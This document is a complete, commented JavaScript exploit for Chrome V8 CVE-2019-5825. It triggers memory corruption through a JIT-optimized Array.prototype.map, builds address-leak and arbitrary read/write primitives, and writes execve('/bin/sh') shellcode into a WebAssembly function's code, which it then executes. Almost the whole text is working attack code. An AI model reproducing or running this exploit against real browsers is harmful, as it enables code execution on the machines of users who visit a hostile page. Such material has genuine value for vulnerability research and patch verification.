

Chrome v8 / CVE-2019-5825

 

 

// Scratch buffer shared by ftoi/itof: a single 8-byte buffer viewed both as
// one float64 and as two uint32 words (u64_buf is a Uint32Array despite its
// name). The word order assumes a little-endian host: u64_buf[0] is the low
// half of the double's bit pattern, u64_buf[1] the high half.
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

/**
 * Reinterpret the raw IEEE-754 bits of a double as a 64-bit BigInt.
 * @param {number} val - the float whose bit pattern is wanted
 * @returns {bigint} (high word << 32) | low word of the encoding
 */
function ftoi(val) {
    f64_buf[0] = val;
    var lo = BigInt(u64_buf[0]);
    var hi = BigInt(u64_buf[1]);
    return (hi << 32n) | lo;
}

/**
 * Inverse of ftoi: the double whose bit pattern is the low 64 bits of val.
 * Anything above bit 63 is discarded by the Uint32Array store (ToUint32),
 * and a negative BigInt contributes its two's-complement low bits.
 * @param {bigint|number} val - bit pattern; coerced with BigInt()
 * @returns {number} the double carrying that bit pattern
 */
function itof(val) {
    var bits = BigInt(val);
    u64_buf[0] = Number(bits & 0xffffffffn);
    u64_buf[1] = Number(bits >> 32n);
    return f64_buf[0];
}

/**
 * Format a Number or BigInt as a 0x-prefixed lowercase hex string.
 * @param {number|bigint} val
 * @returns {string}
 */
function hex(val) {
    return `0x${val.toString(16)}`;
}

// Heap shaping: allocate a 2^30-element array and immediately drop it. The
// result is never used, so this is presumably there to influence the heap
// layout before `victim` and the map result are allocated — TODO confirm
// against the original write-up what layout it is meant to produce.
Array(2 ** 30);


function assert(x){
	if(x){
		return;
	}
	else{
		throw "assert fail";
	}
}

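/**
 * Callback handed to Array.prototype.map via mapping(). Receives the element
 * and its index; the element value itself is ignored.
 *
 * At index 0x1a (26) it creates the 5-element float array `victim` as an
 * implicit global, i.e. victim is allocated while the map is still running.
 * Any index above 0x1a aborts the map by throwing, so the callback only ever
 * runs for indices 0..0x1a, and the caller is expected to land in its catch
 * block. Every call returns the Smi 0xdded (56813): the double encoding of
 * 56813.0 is 0x40ebbda000000000, whose high word 0x40ebbda0 is exactly the
 * value the catch block later checks victim.length against — consistent with
 * the map result's element store landing on victim's length field (TODO
 * confirm against the V8 fix for this CVE).
 *
 * @param {*} val - current element (unused)
 * @param {number} i - element index
 * @returns {number} 0xdded
 * @throws {Error} "error" when i > 0x1a, to stop the map
 */
function go(val, i) {
    if (i > 0x1a) {
        throw new Error("error");
    }
    if (i === 0x1a) {
        // Created mid-map: its length field is the corruption target, so the
        // map's last element write has to happen after this allocation.
        victim = [1.1, 2.2, 3.3, 4.4, 5.5];
    }
    return 0xdded;
}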
/**
 * Thin wrapper around Array.prototype.map with `go` as the callback. The
 * warm-up loop below calls this many times, presumably so that this map
 * call site is the one that gets JIT-optimized before the large array is
 * passed in — TODO confirm.
 * @param {Array} a - array to map over
 * @returns {Array} the map result (go returns 0xdded for each element)
 */
function mapping(a) {
    var mapped = a.map(go);
    return mapped;
}
// Seed array for the warm-up calls (implicit global). The elision at index 1
// leaves a hole, so presumably V8 gives this a HOLEY elements kind rather
// than PACKED — TODO confirm why the holey kind is needed for the map path
// being exercised.
a=[1,,3];

// Minimal WebAssembly module. Decoding the bytes: one type () -> i32, one
// function of that type whose body is `i32.const 42; end`, one memory of
// 1 page, an empty funcref table, no globals, and two exports: "memory" and
// "main". It does nothing useful by itself; the instance is used further
// down as the object whose address is leaked ("RWX ptr"), and the address
// read out of it is where the shellcode gets written before main is called.
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main; // returns 42 until its code is overwritten


// Warm-up: call mapping() 0x10000 times on the small holey array so the map
// call site is optimized before the large array is used (presumably the bug
// is in the optimized/fast path — TODO confirm against the V8 fix). Note `i`
// is an implicit global and is reused as the loop counter further down.
for(i=0;i<0x10000;i++){
    mapping(a);
}
// Grow `a` to (32 MiB - 1) elements, fill every slot, then push two more so
// the final length is 32*1024*1024 + 1. The exact length is what matters
// for the bug; the two pushes are presumably there to cross the 32 MiB
// boundary after the fill rather than via fill() — TODO confirm.
a.length=32 * 1024 * 1024-0x1;
a.fill(1);
a.push(2);
a.push(1);
// Trigger. go() creates `victim` at index 0x1a and throws at 0x1b, so
// mapping() is expected to throw and `b` is never assigned. The corruption
// is only verified on that catch path: victim.length must now read
// 0x40ebbda0, the high word of the double 56813.0 (0xdded, what go returns).
// If mapping() returns normally, nothing here notices that the bug did not
// fire.
try{
	b = mapping(a);
}catch{
    assert(victim.length==0x40ebbda0);
}



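// Guard: the catch block above only runs when mapping() threw. If the bug
// did not fire, `victim` is either undefined or still an ordinary 5-element
// array, and the OOB reads below would spin or crash. Fail loudly instead of
// announcing success.
if (typeof victim === "undefined" || victim.length !== 0x40ebbda0) {
    throw new Error("victim.length not corrupted; bug did not trigger");
}
console.log("Bug triggerd!")
// Out-of-bounds read past victim's 5 real elements. Index 7 appears to land
// on the `elements` pointer of the victim JSArray itself (consistent with the
// JSArray being placed right after its FixedDoubleArray backing store and the
// `-2n` header adjustment in the offset computation below); `element` is then
// used as the base address for computing write indices — TODO confirm for
// the target build.
element = ftoi(victim[7]);
console.log("element = " + hex(element));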


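// Locate `addr` relative to victim by scanning victim's (now huge) element
// window for the two Smi markers. On 64-bit V8 without pointer compression a
// Smi is stored as value << 32, so 0x1234 and 0x1357 read back through the
// float view as 0x123400000000 and 0x135700000000. Once found, addr[2] is a
// tagged-pointer slot the script can read through victim: storing an object
// into it and reading victim[addr_idx+2] leaks that object's address.
addr = [0x1234, 0x1357, {"a": "a"}];
var addr_found = false;
// Bound the scan by the corrupted length instead of looping forever: past
// victim.length the reads return undefined, ftoi() yields NaN bits, and the
// original unbounded loop would never terminate. Loose `==` is deliberate:
// ftoi() returns a BigInt and the markers are Numbers, and `===` between a
// BigInt and a Number is always false.
for (addr_idx = 0; addr_idx + 1 < victim.length; addr_idx++) {
    if (ftoi(victim[addr_idx]) == 0x123400000000) {
        if (ftoi(victim[addr_idx + 1]) == 0x135700000000) {
            console.log("addr idx found!!  " + addr_idx);
            addr_found = true;
            break;
        }
    }
}
if (!addr_found) {
    throw new Error("addr markers not found in victim's OOB window");
}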


// Leak the address of the wasm instance: store it into addr[2] and read the
// slot back through victim's OOB view. The value is a tagged pointer (low
// bit set) and the +0x100 selects a field inside the instance object; the
// -1n applied later strips the tag. The script does not write shellcode to
// `leak` directly: it first dereferences this address (reads 8 bytes at
// leak-1 through the hijacked DataView below) to obtain the real code
// pointer. 0x100 is presumably the offset of the field holding the
// instance's JIT code / jump-table start in this V8 build — TODO confirm.
addr[2]=wasm_instance;
leak = ftoi(victim[addr_idx+2])+0x100n
console.log("RWX ptr = "+hex(leak))

// Fresh 0x100-byte ArrayBuffer whose backing-store pointer is about to be
// hijacked to get arbitrary read/write through `dataview`. Note this
// re-declares the global `buf` from the ftoi/itof setup; those helpers still
// work because they go through f64_buf/u64_buf, which keep viewing the
// original 8-byte buffer.
var buf = new ArrayBuffer(0x100);
var dataview = new DataView(buf);

// Leak the ArrayBuffer's address the same way, via addr[2]. The +0x20 is the
// offset of the field inside JSArrayBuffer that the script treats as the
// backing_store pointer (presumably correct for this V8 build — TODO
// confirm). The tag bit is not stripped here; it cancels against the tag in
// `element` when the two are subtracted in the offset computation below.
addr[2]=buf;
back = ftoi(victim[addr_idx+2])+0x20n
console.log("backingstore ptr = "+hex(back))

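// Index into victim that aliases buf's backing_store field. victim[k] lives
// at elements + 16 + 8*k (two header words: map and length), so if `element`
// is the tagged address of victim's elements store then k = (back - element)
// / 8 - 2. Both addresses carry the tag bit, so it cancels in the subtraction.
offset = ((back - element) / 8n) - 2n;
console.log("offset = " + hex(offset));

// Step 1: point buf's backing store at the wasm-instance field found above
// (leak - 1n strips the pointer tag), so the DataView now reads that field.
victim[offset] = itof(leak - 1n);
// Read the 8-byte little-endian pointer stored there as a BigInt. The
// previous byte-by-byte Number accumulation (tmp * 0x100**i) silently loses
// precision for values above 2^53; getBigUint64 is exact and shipped in V8
// together with BigInt, which this script already depends on.
test = dataview.getBigUint64(0, true);
// Step 2: make that pointer (the code address) the new backing store, so the
// shellcode writes through dataview below land in executable memory.
victim[offset] = itof(test);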

// Shellcode as 32-bit words whose bytes are listed most-significant first,
// which is why each word is byte-swapped and then written little-endian
// below. Decoded, it is the standard x86-64 Linux execve stub: a 4-byte NOP
// sled, then push "/bin///sh\0" onto the stack, rdi -> that path, build
// argv = ["sh", NULL] on the stack with rsi -> argv, rdx = NULL (envp),
// rax = 0x3b (execve), syscall. It is Linux/x86-64 specific.
shellcode=[0x90909090,0x6a6848b8,0x2f62696e,0x2f2f2f73,0x504889e7,0x68726901,0x01813424,0x01010101,0x31f6566a,0x085e4801,0xe6564889,0xe631d26a,0x3b580f05]
/**
 * Reverse the byte order of a 32-bit value. The input is coerced to 32 bits
 * by the bitwise operators, and the result is a signed int32 (negative when
 * the original low byte is >= 0x80), which DataView.setUint32 later converts
 * back with ToUint32, so the emitted bytes are unaffected.
 * @param {number} val - 32-bit word
 * @returns {number} the word with its four bytes reversed, as int32
 */
function swap32(val) {
    var b0 = val & 0xFF;
    var b1 = (val >>> 8) & 0xFF;
    var b2 = (val >>> 16) & 0xFF;
    var b3 = (val >>> 24) & 0xFF;
    return (b0 << 24) | (b1 << 16) | (b2 << 8) | b3;
}

// Byte-swap each word so that the little-endian setUint32 writes below emit
// the bytes in the order they were listed in the shellcode table.
shellcode=shellcode.map(swap32)
// `dataview` still wraps `buf`, but buf's backing store now points at the
// code address read out of the wasm instance, so these writes patch that
// memory rather than the original 0x100-byte buffer. `i` is the implicit
// global loop counter reused throughout the script.
for(i=0;i<shellcode.length;i++){
	dataview.setUint32(i*4,shellcode[i],true);
}
// Calling the exported wasm function presumably now lands in the overwritten
// code and runs the shellcode (execve of /bin/sh on Linux x86-64).
f();
